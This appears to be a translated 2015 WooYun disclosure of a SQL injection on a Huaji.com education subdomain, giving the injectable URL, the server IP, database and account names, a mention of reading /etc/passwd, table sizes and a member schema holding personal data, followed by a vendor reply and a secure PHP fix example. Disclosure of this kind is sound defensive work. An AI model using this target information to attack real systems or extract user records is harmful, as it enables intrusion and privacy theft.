Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0118563

Title: SQL injection on a Huaji.com site (root privileges, all data exposed)

Vendor: 浙江花集网科技有限公司 (Zhejiang Huaji Network Technology Co., Ltd.)

Author: 路人甲

Submitted: 2015-06-06 10:50

Fixed: 2015-07-23 11:14

Published: 2015-07-23 11:14

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-06-06: Details sent to the vendor; awaiting vendor action
2015-06-08: Vendor confirmed; details disclosed to the vendor only
2015-06-18: Details disclosed to core white hats and domain experts
2015-06-28: Details disclosed to regular white hats
2015-07-08: Details disclosed to intern white hats
2015-07-23: Details disclosed to the public

Brief description:

With this much data exposed, doesn't this deserve a high rank?

Detailed description:

http://xue.huaji.com/space/business.php?u=1199795328 is the injection point.
Running it through the tool:

Target: 		http://xue.huaji.com/space/business.php?u=1199795328
Host IP: 120.199.8.178
Web Server: nginx/1.0.15
Powered-by: PHP/5.3.3
DB Server: MySQL >=5
Resp. Time(avg): 129 ms
Current User: ourbloom@192.168.1.181
Sql Version: 5.1.52
Current DB: hj
System User: ourbloom@192.168.1.10
Host Name: ourbloom15
Installation dir: /usr/
DB User & Pass: [mysql.user dump omitted: one user:password-hash:host entry per account, including root and several accounts allowed from any host]
Data Bases: information_schema
hj
hj1
hj2
hj3
hj4
hj5
hj6
hj7
hj8
hj9
hj_auction
hj_market
hj_office
hwxbbs
mysql
seociku
test


All kinds of data in there. Reading /etc/passwd as well:

[Screenshot: QQ截图20150606012605.jpg]


Tables in the current database:

Database: hj
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| goods_property | 211403 |
| rebate_logs | 123184 |
| rebates | 55829 |
| member_apply | 47441 |
| member | 46027 |
| member_extend | 46027 |
| seller_apply | 40891 |
| cms_articleextend | 36373 |
| cms_articlecontent | 36247 |
| cms_article | 35900 |
| goods_image | 34434 |
| seller | 27720 |
| quote | 26372 |
| goods_apply | 24872 |
| seller_map | 22281 |
| member_point | 21020 |
| card | 19263 |
| goods | 18567 |
| charge_seller | 16545 |
| member_study | 13365 |
| answer | 12657 |
| category_goods | 11554 |
| sponsion | 11332 |
| gcategory | 10799 |
| goods_price | 10046 |
| certify_log | 8014 |
| sponsion_apply | 7985 |
| question | 7884 |
| member_job | 7004 |
| flower_apply | 6541 |
| property_value | 5566 |
| address | 5271 |
| seller_cooperation | 4603 |
| employee_resource | 4301 |
| ad_region | 3567 |
| fbwords | 3416 |
| region | 3285 |
| collect | 3215 |
| member_ability | 2809 |
| employee_allowcode | 2308 |
| seller_plan | 2261 |
| cart | 2025 |
| prefer_member | 1926 |
| order_complaint | 1793 |
| sponsion_plan | 1714 |
| seller_region | 1698 |
| excellent_apply | 1472 |
| ad_search_old | 1419 |
| resource | 1247 |
| cms_attach | 1240 |
| property | 1062 |
| seller_domain | 909 |
| noshop | 908 |
| seller_link | 906 |
| seller_decoration | 864 |
| image_property | 786 |
| seller_punish | 687 |
| product_library | 592 |
| goods_holiday | 548 |
| ad_region_order | 527 |
| florist_log | 417 |
| excellent_region | 413 |
| image | 378 |
| member_astrict | 317 |
| seller_rights | 315 |
| ad_region_right | 291 |
| video_property | 273 |
| admin_menu | 262 |
| seller_ratio | 258 |
| inform | 251 |
| image_log | 229 |
| excellent | 217 |
| ad_order | 203 |
| feedback | 191 |
| member_foul | 190 |
| charge | 178 |
| compen_logs | 141 |
| cms_comment | 138 |
| goods_holiday_master | 137 |
| member_mobile_change | 116 |
| goods_qa | 95 |
| seller_festival | 94 |
| compensation | 93 |
| rebate_log_hj | 93 |
| ad_region_banner | 85 |
| member_id_change | 80 |
| seller_member | 77 |
| member_cancel | 72 |
| inform_log | 65 |
| prefer | 65 |
| shop_feedback | 62 |
| employee | 53 |
| appeal | 47 |
| ad_region_pic | 45 |
| store_cancel | 45 |
| astrict_white | 44 |
| florist | 43 |
| topic | 43 |
| member_id_changelog | 38 |
| seller_limit_master | 36 |
| quote_product | 35 |
| video | 35 |
| brand_apply | 23 |
| bill_ourbloom | 19 |
| bill_bank | 17 |
| product_librarycate | 17 |
| cms_column | 13 |
| dept | 12 |
| sms_template | 12 |
| print_template | 11 |
| seller_limit | 11 |
| member_stint | 9 |
| video_log | 8 |
| mgrade | 7 |
| friend_link | 6 |
| topic_cat | 5 |
| fbwords_seller | 4 |
| question_cat | 4 |
| auto_status | 3 |
| excellent_price | 3 |
| seller_price | 3 |
| goods_rights | 1 |
| setting | 1 |
+----------------------+---------+


40,000+ member records:

Table: member
[52 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| activation | varchar(60) |
| address | varchar(256) |
| alipay_uid | varchar(60) |
| birthday | date |
| buyer_credit | float(8,0) |
| charges | decimal(6,2) |
| charges_status | tinyint(4) |
| chinese_city | varchar(32) |
| chinese_country | varchar(32) |
| chinese_province | varchar(32) |
| chinese_town | varchar(32) |
| city | varchar(8) |
| cost_ratio | decimal(6,2) |
| country | varchar(8) |
| default_feed | tinyint(4) |
| email | varchar(60) |
| expiry | int(11) |
| feed_config | text |
| gender | tinyint(4) |
| guider | varchar(20) |
| home_phone | varchar(60) |
| huaji_flag | tinyint(4) |
| id | int(11) |
| last_ip | varchar(15) |
| last_login | int(11) |
| mobile_phone | varchar(60) |
| msn | varchar(60) |
| office_phone | varchar(60) |
| operator | varchar(50) |
| outer_id | int(11) |
| password | varchar(32) |
| portrait | varchar(256) |
| province | varchar(8) |
| ptemplate | tinyint(4) |
| qq | varchar(60) |
| qq_uid | varchar(100) |
| real_name | varchar(60) |
| reg_ip | varchar(15) |
| reg_time | int(11) |
| repwd_code | varchar(32) |
| seller_credit | float(8,0) |
| sina_uid | int(11) |
| source_pwd | varchar(32) |
| store_id | int(11) |
| taobao_uid | int(11) |
| test | tinyint(4) |
| town | varchar(8) |
| ugrade | tinyint(4) |
| updatetime | int(11) unsigned |
| user_name | varchar(60) |
| visit_count | int(11) |
| zip | char(6) |
+------------------+------------------+


QQ, Taobao ID, Sina ID, address, real name...
Dumped a few rows as proof:

[Screenshot: QQ截图20150606013647.jpg]


In the spirit of finding and fixing problems, I did not go any further.

Proof of vulnerability:

(Identical to the detailed description above.)

Fix recommendation:

Go and audit your code properly.
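What that audit should end up with, as an added example rather than the vendor's code (the report shows no source for business.php): the `u` parameter is validated as an integer and bound through a prepared statement, and the page connects with a read-only account instead of root. The function names, the `hj_web_readonly` account and the DSN host are placeholders; `member`, `id` and `user_name` come from the dumped schema.

```php
<?php
// Added example, not the vendor's code: the report shows no source for
// business.php, so the vulnerable pattern is a reconstruction of how a
// ?u= value ends up in a query when the page is injectable.
// Table `member` and columns `id`, `user_name` come from the dumped schema.

// Vulnerable pattern (assumed): the raw GET value is concatenated into SQL,
// so whatever the client sends is parsed as part of the statement.
function lookupMemberVulnerable(mysqli $db, array $get)
{
    $sql = "SELECT id, user_name FROM member WHERE id = " . $get['u'];
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// Hardened version: validate the type, bind the value, fail closed.
function lookupMemberSafe(PDO $db, array $get)
{
    // 1. Input validation: a member id is a positive integer; anything
    //    else is rejected before the database is touched.
    $raw = isset($get['u']) ? $get['u'] : null;
    $u = filter_var($raw, FILTER_VALIDATE_INT,
                    array('options' => array('min_range' => 1)));
    if ($u === false) {
        header('HTTP/1.1 400 Bad Request');
        return null;
    }
    // 2. Prepared statement: the value travels separately from the SQL
    //    text, so the server never parses it as SQL.
    $stmt = $db->prepare('SELECT id, user_name FROM member WHERE id = :u');
    $stmt->bindValue(':u', $u, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Least privilege: connect as a read-only account scoped to `hj`
//    instead of root, so a single injectable page cannot read mysql.user
//    or the filesystem. Account name and host are placeholders.
function connectReadOnly()
{
    $dsn = 'mysql:host=DB_HOST_PLACEHOLDER;dbname=hj;charset=utf8';
    return new PDO($dsn, 'hj_web_readonly', getenv('HJ_DB_PASSWORD'), array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ));
}
```

The read-only account is created on the database side with a grant limited to `SELECT` on the `hj` schema from the web host only, which also removes the `%`-host and empty-password entries the dump exposed.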

Copyright notice: please credit the source when reposting: 路人甲@WooYun (乌云)


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-06-08 11:13

Vendor reply:

Thanks for the submission.

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-09-14 11:19 | 憋屈 (Intern white hat | Rank:47 Vulnerabilities:14 | I am a cloud in the sky, occasionally casting its shadow on the ripples of your heart.)

    Did you file this one through the small-vendor route?